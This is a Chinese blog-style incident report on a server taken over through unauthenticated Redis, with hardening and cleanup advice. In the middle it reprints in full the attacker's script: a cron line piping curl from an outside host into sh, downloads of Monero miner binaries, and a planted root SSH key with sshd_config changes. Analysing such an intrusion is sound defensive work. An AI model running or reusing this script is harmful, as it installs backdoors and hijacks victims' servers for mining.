Redis未受權訪問缺陷讓服務器淪爲肉雞

朋友的一個項目說接到阿里雲的告警，提示服務器已淪爲肉雞，網絡帶寬被大量佔用，網站訪問很慢，經過SSH遠程管理服務器還頻繁斷開連接。應朋友的邀請，我便參與了此次事件的處理全過程：

阿里雲的安全告警郵件內容：


 

在沒有查到異常進程以前我是先把操做系統的帶寬&端口用iptables 作了限制這樣能保證我能遠程操做服務器才能查找緣由.



在各類netstat –ntlp  的查看下沒有任何異常。在top 下查到了有異常進程 還有些異常的這裏就截圖一個：

 

結果果斷把進程給kill -9  了  沒想到再去ps的時候又來了 意思就是會自動啓動它。
這就讓我想到了crond 這個自動任務果不其然 /var/sprool/cron/root 這個文件被人作了手腳 並且是二進制的，果斷又給刪除了，覺得這下沒事告終果過了
兩分鐘這個文件又來這個就引發我主要了聯想到了是否是有說明守護進程了 這樣的事情確定是有守護進程在纔會發生的了。因而我去百度了下  jyam -c x -M stratum+tcp 果不其然 確實有這樣的攻擊，這個攻擊是因爲redis 未受權登錄漏洞引發致使黑客利用的。

漏洞概述

Redis 默認狀況下，會綁定在 0.0.0.0:6379，這樣將會將Redis服務暴露到公網上，若是在沒有開啓認證的狀況下，能夠致使任意用戶在能夠訪問目標服務器的狀況下未受權訪 問Redis以及讀取Redis的數據。攻擊者在未受權訪問Redis的狀況下能夠利用Redis的相關方法，能夠成功將本身的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中，進而能夠直接登陸目標服務器。

漏洞描述

Redis 安全模型的觀念是: 「請不要將Redis暴露在公開網絡中, 由於讓不受信任的客戶接觸到Redis是很是危險的」 。
Redis 做者之因此放棄解決未受權訪問致使的不安全性是由於, 99.99%使用Redis的場景都是在沙盒化的環境中, 爲了0.01%的可能性增長安全規則的同時也增長了複雜性, 雖然這個問題的並非不能解決的, 可是這在他的設計哲學中還是不划算的。
由於其餘受信任用戶須要使用Redis或者由於運維人員的疏忽等緣由，部分Redis 綁定在0.0.0.0:6379，而且沒有開啓認證（這是Redis的默認配置），若是沒有進行採用相關的策略，好比添加防火牆規則避免其餘非信任來源 ip訪問等，將會致使Redis服務直接暴露在公網上，致使其餘用戶能夠直接在非受權狀況下直接訪問Redis服務並進行相關操做。利用Redis自身的相關方法，能夠進行寫文件操做，攻擊者能夠成功將本身的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中，進而能夠直接登陸目標服務器。  （致使能夠執行任何操做）

漏洞影響

Redis 暴露在公網（即綁定在0.0.0.0:6379，目標IP公網可訪問），而且沒有開啓相關認證和添加相關安全策略狀況下可受影響而致使被利用。

在網上我查到這個被黑客編譯成二進制的源文件代碼 (關於redis 未受權登錄安全措施：

1 配置bind選項, 限定能夠鏈接Redis服務器的IP, 並修改redis的默認端口6379. 防火牆控制好容許IP鏈接就好

2 配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.

3 配置rename-command CONFIG "RENAME_CONFIG", 這樣即便存在未受權訪問, 也可以給攻擊者使用config指令加大難度

4是Redis做者表示將會開發」real user」，區分普通用戶和admin權限，普通用戶將會被禁止運行某些命令，如config

)

##網上查到腳本內容大體以下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root

# echo "*/2 * * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr" >> /var/spool/cron/root

echo "*/5 * * * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &" >> /var/spool/cron/root 

ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then

         mkdir -p ~/.ssh

         rm -f ~/.ssh/authorized_keys*

         echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq

         echo "PermitRootLogin yes" >> /etc/ssh/sshd_config

         echo "RSAAuthentication yes" >> /etc/ssh/sshd_config

         echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config

         echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

         /etc/init.d/sshd restart

fi 

if [ ! -f "/opt/yam/yam" ]; then

         mkdir -p /opt/yam

         curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam

         chmod +x /opt/yam/yam

         # /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr

fi

if [ ! -f "/opt/gg3lady" ]; then

         curl -f -L https://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady

         chmod +x /opt/gg3lady

fi

# yam=$(ps auxf | grep yam | grep -v grep | wc -l)

# gg3lady=$(ps auxf | grep gg3lady | grep -v grep | wc -l)

# cpu=$(cat /proc/cpuinfo | grep processor | wc -l) 

# curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname -i`

因而終於找到源頭了，

下面咱們來分析下這個腳本

整個腳本的大體就這樣

處理方法只要把 /var/spool/cron/root 刪除   /opt/yam/yam   刪除   /opt/gg3lady  刪除  .ssh/KHK75NEOiq 刪除把gg3lady  yam     進程結束 還有就是sshd_confg 文件還原 應該就沒問題了。可是爲了安全起見仍是但願重裝服務器，不確保別人不留其餘的漏洞

對應的安全處理：
一、限制Redis的訪問IP，如指定本地IP獲指定特定IP能夠訪問。
二、若是是本地訪問和使用，打開防火牆（阿里雲等操做系統，默認把防火牆關了），不開放Redis端口，最好修改掉Redis的默認端口；
三、若是要遠程訪問，給Redis配置上受權訪問密碼；

 本文技術支持：龍果學院 www.roncoo.com